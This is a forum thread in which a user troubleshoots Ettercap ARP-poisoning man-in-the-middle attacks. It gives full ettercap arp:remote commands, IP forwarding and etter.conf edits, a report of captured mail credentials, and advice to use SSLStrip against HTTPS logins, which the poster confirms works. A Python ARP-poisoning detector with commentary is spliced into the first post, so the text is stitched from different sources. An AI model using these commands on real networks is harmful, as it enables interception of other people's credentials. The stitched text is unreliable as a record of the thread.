
Thread: ETTERCAP - Buggy

  1. #1

    ETTERCAP - Buggy

    Hello fellow Backtrack Users

    I have been holding myself back from asking this question for 7 days now. I apologize if this has already been addressed somewhere else; I have searched above and beyond and to no avail can I solve this issue.

    The issue is as follows...

    I am running Backtrack 4 on the acer aspire one 160GB version
    Backtrack 4 is running from Kingston 8 GB USB with Persistent changes

    I am using ettercap in terminal via command line

    Whenever I execute the MitM ARP poisoning and try to visit a site that requires a login, such as gmail.com, youtube.com, hotmail.com, etc...

    The browser (IE and Firefox) hangs/lags/never loads the page; the status bar shows the page loading, but it never actually loads it (Vista and XP SP1, SP2, SP3)
    _______________________________________________________________
    I have uncommented (#) the iptables lines in the etter.conf file

    I have tried " echo 1 > /proc/sys/net/ipv4/ip_foprward"
    and " echo "1" > /proc/sys/net/ipv4/ip_foprward"

    I have tried
    "ettercap -i ath0 -Tq -M arp:remote // -p autoadd"
    "ettercap -i ath0 -Tq -M arp:remote // // -p autoadd"
    "ettercap -i ath0 -Tq -M arp:remote /192.168.1.1/ // -p autoadd"
    "ettercap -i ath0 -Tq -M arp:remote /192.168.1.1/ /192.168.1.100/ -p autoadd"

    I have also tried

    "ettercap -i ath0 -Tq -M ARP // -p autoadd"
    "ettercap -i ath0 -Tq -M ARP // // -p autoadd"
    "ettercap -i ath0 -Tq -M ARP /192.168.1.1/ // -p autoadd"
    "ettercap -i ath0 -Tq -M ARP /192.168.1.1/ /192.168.1.100/ -p autoadd"
    _______________________________________________________________
    I also purchased a USB wireless key (TP-Link TL-WN321G using the rt73 chipset), thinking it might have been my integrated card causing the problem

    It successfully captures credentials if I use Outlook and Windows Mail...
    I can browse to all other sites, except those requiring a login (as stated above)

    The issue seems to solve itself whenever it decides to (1 out of 20 tries)
    Each try meaning: resetting all PCs, unplugging and plugging in the router (Linksys WRT54G)

    Driftnet successfully captures the pictures

    On my Windows machines the "arp -a" command in command prompt gives the following result
    _______________________________________________________________
    C:\Documents and Settings\Zeus>arp -a

    Interface: 192.168.1.100 --- 0x2
      Internet Address      Physical Address      Type
      192.168.1.1           00-13-10-99-a9-e6     dynamic
      192.168.1.102         00-23-4e-2d-22-63     dynamic
      192.168.1.103         00-23-4e-2d-22-63     dynamic
      192.168.1.105         00-23-4e-2d-22-63     dynamic
    _______________________________________________________________

    When I would press "q" during the ARP poisoning attack to stop the attack
    I used to receive the following error

    "iptables v1.4.0: can't initialize iptables" 'nat' : Permission denied (you must be root) Perhaps iptables or your kernel needs to be upgraded"

    I "solved" this by editing the [privs] section in the etter.conf file:
    ec_uid = 0
    _______________________________________________________________
    On the rare occasion that MitM ARP poisoning worked, when I pressed "q" to quit I would receive this error anyway

    "iptables v1.4.0: can't initialize iptables" 'nat' : Permission denied (you must be root) Perhaps iptables or your kernel needs to be upgraded"

    before editing the [privs] section in the etter.conf file
    ec_uid = 0
    _______________________________________________________________

    I am having a very hard time analysing the source of this problem

    (The browser (IE and Firefox) hangs/lags/never loads the page; the status bar shows the page loading, but it never actually loads it (Vista and XP SP1, SP2, SP3))

    because of the inconsistencies, nothing seems to cause it to work, or not to work...

    If anyone has experienced this, please post your Success/Failure/Workaround/Solution/Concern
    _______________________________________________________________

    Off subject: this being my first post, I would like to thank all those who participate in this forum. I have been using this forum for over a year now, and have never had to ask a question because of the excellent support... Thank you for all the great documentation/support/tutorials.
    Keep up the good work, everyone
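    The `arp -a` listing in the post above already shows the tell-tale sign of an ARP cache being poisoned: one physical address answering for several IP addresses. The following is an added example, not code from the thread, that parses that Windows `arp -a` format and flags exactly that condition, plus a gateway whose MAC no longer matches a trusted value recorded earlier (the trusted MAC is an assumption supplied by the caller).

```python
"""Detect ARP-cache poisoning indicators in Windows `arp -a` output.

Added example for this thread: flags a MAC that claims more than one IP
(the pattern in the post's table) and a gateway whose MAC has changed.
"""
import re
from collections import defaultdict

# Sample text copied from the `arp -a` output quoted in the post above.
ARP_OUTPUT = """\
Interface: 192.168.1.100 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-13-10-99-a9-e6     dynamic
  192.168.1.102         00-23-4e-2d-22-63     dynamic
  192.168.1.103         00-23-4e-2d-22-63     dynamic
  192.168.1.105         00-23-4e-2d-22-63     dynamic
"""

# One entry line: <ip> <mac with - or : separators> <type>
ENTRY = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-f]{2}(?:[-:][0-9a-f]{2}){5})\s+(\w+)",
    re.IGNORECASE,
)

def _norm(mac):
    return mac.lower().replace("-", ":")

def parse_arp(text):
    """Return {ip: mac} for every entry line; MACs normalised to lowercase ':' form."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            table[m.group(1)] = _norm(m.group(2))
    return table

def duplicate_macs(table):
    """MACs that claim more than one IP address: {mac: [ip, ...]}."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def gateway_changed(table, gateway_ip, known_mac):
    """True if the gateway now resolves to a MAC other than the trusted one."""
    current = table.get(gateway_ip)
    return current is not None and current != _norm(known_mac)

if __name__ == "__main__":
    t = parse_arp(ARP_OUTPUT)
    for mac, ips in duplicate_macs(t).items():
        print(f"ALERT: {mac} answers for {len(ips)} hosts: {', '.join(ips)}")
    # Hypothetical trusted gateway MAC recorded on a clean network (assumption).
    if gateway_changed(t, "192.168.1.1", "00-13-10-99-a9-e6"):
        print("ALERT: gateway MAC changed")
```

    A shared MAC can also be legitimate (one host with several addresses, or a router doing proxy ARP), so treat the output as a prompt to verify against a known-good baseline rather than as proof on its own.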

  2. #2

    Hmm... possibly check for a "1" in /proc/sys/net/ipv4/ip_forward

  3. #3


    It's the SSL on the pages that require login. You need to set up ettercap for MITM SSL.

    edit etter.conf (use locate)
    look for iptables under "Linux" and uncomment both lines
    ettercap -T -q -i whateverinterface -M arp:remote // //

  4. #4


    I have the same problem with ettercap in -M arp:remote mode, despite echo 1 > /proc/sys/net/ipv4/ip_forward and configuring etter.conf for ec_uid and ec_gid = 0, and redir_command for iptables.
    I mean everything goes well with HTTP, but traffic is blocked when the "test machine" requests HTTPS for iGoogle or Facebook. Captures with Wireshark show the "test machine" TCP requests for HTTPS but no answers (see below)
    Did you fix this?

    Suse 11.1
    ettercap NG-0.7.3

    Wireshark captures during HTTPS requests from the "test machine" (192.168.1.101):

    No. Source Destination Protocol Info

    673 192.168.1.101 74.125.65.147 TCP ecomm > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    696 192.168.1.101 74.125.65.147 TCP ecomm > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    735 192.168.1.101 74.125.65.147 TCP ecomm > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    820 192.168.1.101 74.125.65.99 TCP stun > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    843 192.168.1.101 74.125.65.99 TCP stun > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    878 192.168.1.101 74.125.65.99 TCP stun > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    950 192.168.1.101 74.125.65.103 TCP twrpc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    969 192.168.1.101 74.125.65.103 TCP twrpc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    1000 192.168.1.101 74.125.65.103 TCP twrpc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    1071 192.168.1.101 74.125.65.104 TCP plethora > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    1072 192.168.1.101 74.125.67.102 TCP nppmp > http [RST, ACK] Seq=638 Ack=126 Win=0 Len=0
    1073 192.168.1.101 74.125.65.100 TCP genisar-port > http [RST, ACK] Seq=725 Ack=268 Win=0 Len=0
    1074 192.168.1.101 74.125.67.102 TCP nppmp > http [RST, ACK] Seq=638 Ack=126 Win=0 Len=0
    1075 192.168.1.101 74.125.65.100 TCP genisar-port > http [RST, ACK] Seq=725 Ack=268 Win=0 Len=0
    1092 192.168.1.101 74.125.65.104 TCP plethora > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    1125 192.168.1.101 74.125.65.104 TCP plethora > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    1188 192.168.1.101 74.125.65.147 TCP cleanerliverc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    1203 192.168.1.101 74.125.65.147 TCP cleanerliverc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460
    1236 192.168.1.101 74.125.65.147 TCP cleanerliverc > https [SYN] Seq=0 Win=16384 Len=0 MSS=1460

  5. #5


    Ettercap is buggy when used in Windows, but it's never gone wrong for me in Linux.
    Try using SSLStrip.
    http://forums.remote-exploit.org/bac...ettercap+https

    Does that help?
    ~ Have you, g0tmi1k? ~

  6. #6

    Still A No Go

    Thanks to those who replied, I tried your suggestions and unfortunately I am still getting browser hangs... I also tried SSLStrip, but as soon as I execute the arpspoof command all the SSL sites hang... I really hope I or anyone else finds a solution to this and posts it here... ETTERCAP is wonderful, but when it doesn't work it's nothing more than what could have been, a hope and a dream...

  7. #7


    Quote Originally Posted by The_Spirit View Post
    Thanks to those who replied, I tried your suggestions and unfortunately I am still getting browser hangs... I also tried SSLStrip, but as soon as I execute the arpspoof command all the SSL sites hang... I really hope I or anyone else finds a solution to this and posts it here... ETTERCAP is wonderful, but when it doesn't work it's nothing more than what could have been, a hope and a dream...
    g0tmi1k, I put the little pride I had left aside and tried your suggestion AGAIN, and all I have to say is WoW... not only did it work, but it worked again and again and again without FAIL

    My hat (the black one, of course) off to you

    Thank You

  8. #8


    Quote Originally Posted by The_Spirit View Post
    g0tmi1k, I put the little pride I had left aside and tried your suggestion AGAIN, and all I have to say is WoW... not only did it work, but it worked again and again and again without FAIL

    My hat (the black one, of course) off to you

    Thank You
    You're more than welcome! Well done for getting it working and trying again!
    Please, put a white hat on
    ~g0tmi1k